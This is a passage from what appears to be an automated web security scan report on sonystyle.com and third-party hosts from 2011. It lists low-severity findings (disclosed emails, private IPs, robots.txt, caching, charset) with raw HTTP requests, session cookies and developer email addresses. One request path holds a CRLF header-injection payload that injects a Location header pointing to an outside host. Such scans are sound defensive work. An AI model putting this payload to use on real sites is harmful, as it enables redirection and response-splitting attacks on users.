User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.9. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 34927
Content-Type: application/x-javascript
Content-Length: 34927
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

// script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

13.10. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Issue detail

The following email address was disclosed in the response:

sammi@oriontransfer.co.nz

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 31605
Content-Type: application/x-javascript
Content-Length: 31605
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

// script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

13.11. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

id@5s.tc

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; fsr.a=1308841092970

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 14 Dec 2010 00:04:21 GMT
Accept-Ranges: bytes
ntCoent-Length: 36836
Content-Type: application/x-javascript
Content-Length: 36836
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
5trk`F$E)#N=#d($J,(vt#qt`cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p="
+"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`"
+"Q`k`8`4$Ns$90`Ud=^E;
...[SNIP]...

13.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The following email address was disclosed in the response:

Sony-Electronics@sel.sony.com

Request

GET /webapp/wcs/stores/servlet/SYNewsletterOptInView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 76256
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 76256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadI
...[SNIP]...
<a href="mailto:mailto:Sony-Electronics@sel.sony.com">Sony-Electronics@sel.sony.com</a>
...[SNIP]...

14. Private IP addresses disclosed previous next
There are 4 instances of this issue:

http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/sonyelectronics
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

14.1. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.131.25

Request

Response

14.2. http://www.facebook.com/sonyelectronics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sonyelectronics

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.171.37

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.3. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.112.2

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; fsr.a=1308841092970

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jun 2011 18:38:05 GMT
Accept-Ranges: bytes
ntCoent-Length: 28134
Content-Type: application/x-javascript
Content-Length: 28134
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

// TEMPORARY FREEZE OVERRIDE
function unFreezePage() {}
function freezePage() {
   popOpen('busyIndicator');
   document.getElementById('busyIndicator').style.cursor = "wait";

   var delayedFunction = f
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

14.4. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.112.2

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; fsr.a=1308841092970

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 03 May 2011 21:22:34 GMT
Accept-Ranges: bytes
ntCoent-Length: 20033
Content-Type: application/x-javascript
Content-Length: 20033
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

/*    SONY | SONY STYLE
*    Homepage JS Functions and Event Listeners
*
*    Author: Steve Rucker, Interactive Developer | B2C CST SAPE Augmentation team | srucker@sapient .com
* Alex Jain, Sr As
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

15. Robots.txt file previous next
There are 3 instances of this issue:

http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1047459996/
http://www.omnitechsupport.com/sony/index.php

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

15.1. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 23 Jun 2011 15:00:01 GMT
Expires: Thu, 23 Jun 2011 15:00:01 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

15.2. http://www.googleadservices.com/pagead/conversion/1047459996/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1047459996/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Thu, 23 Jun 2011 14:59:54 GMT
Expires: Thu, 23 Jun 2011 14:59:54 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

15.3. http://www.omnitechsupport.com/sony/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/sony/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.omnitechsupport.com

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 09 Mar 2011 21:51:01 GMT
ETag: "aa556a-91-b9865b40"
Accept-Ranges: bytes
Content-Length: 145
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.omnitechsupport.com

User-agent: *
Disallow: /services/

Sitemap: http://www.omnitechsupport.com/sitemap.xml

16. Cacheable HTTPS response previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.websitealive5.com
Path:	/favicon.ico

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

Request

GET /favicon.ico HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:50 GMT
Content-Length: 35

<h1>404 - File Not Found</h1>

17. HTML does not specify charset previous next
There are 7 instances of this issue:

http://www.docs.sony.com/reflib/docget.asp
http://www.docs.sony.com/startchat.asp
http://www.sonystyle.com/4a76d%0d%0aLocation:%20http://xss.cx
http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView
https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp
https://www.websitealive5.com/favicon.ico

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

17.1. http://www.docs.sony.com/reflib/docget.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.docs.sony.com
Path:	/reflib/docget.asp

Request

GET /reflib/docget.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.2. http://www.docs.sony.com/startchat.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.docs.sony.com
Path:	/startchat.asp

Request

GET /startchat.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.3. http://www.sonystyle.com/4a76d%0d%0aLocation:%20http://xss.cx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/4a76d%0d%0aLocation:%20http://xss.cx

Request

GET /4a76d%0d%0aLocation:%20http://xss.cx HTTP/1.1
Host: www.sonystyle.com
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844298|PC#1308841090453-474854.17#1310052038|check#true#1308842498; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedburpburp; s_channel=%5B%5B%27Other%27%2C%271308842437917%27%5D%5D; s_sq=%5B%5BB%5D%5D; TS5bbf46=cefc48127b1086f50e229f977108f9dea8a8150f8ba2300a4e0359c7; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":3,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE

Response

HTTP/1.0 408 Request Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Date: Thu, 23 Jun 2011 15:24:19 GMT
Content-Type: text/html
Content-Length: 218
Expires: Thu, 23 Jun 2011 15:24:19 GMT

<HTML><HEAD>
<TITLE>Request Timeout</TITLE>
</HEAD><BODY>
<H1>Request Timeout</H1>
The server timed out while waiting for the browser's request.<P>
Reference #2.881ff648.1308842659&#46
...[SNIP]...

17.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CategoryDisplay

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId
=10551&storeId=10151&langId=-1&identifier=S_Sony_Howdini HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 216
Expires: Thu, 23 Jun 2011 15:20:00 GMT
Date: Thu, 23 Jun 2011 15:20:00 GMT
Connection: close

<HTML><HEAD>
<TITLE>Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Reference #7.881ff648.1308842400.0

...[SNIP]...

17.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/ContentDisplayView

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?hideHeaderFooter
=false&storeId=10151&catalogId=10551&langId=-1&cmsId=STATICS_BIV_showcase HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 216
Expires: Thu, 23 Jun 2011 15:20:02 GMT
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close

<HTML><HEAD>
<TITLE>Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Reference #7.881ff648.1308842402.0

...[SNIP]...

17.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.websitealive5.com
Path:	/4405/operator/guest/gLogin_Server.asp

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

17.7. https://www.websitealive5.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.websitealive5.com
Path:	/favicon.ico

Request

Response

18. Content type incorrectly stated previous next
There are 5 instances of this issue:

http://sr2.liveperson.net/hcp/html/mTag.js
http://www.apache.org/licenses/LICENSE-2.0
http://www.docs.sony.com/reflib/docget.asp
https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp
https://www.websitealive5.com/favicon.ico

Issue background

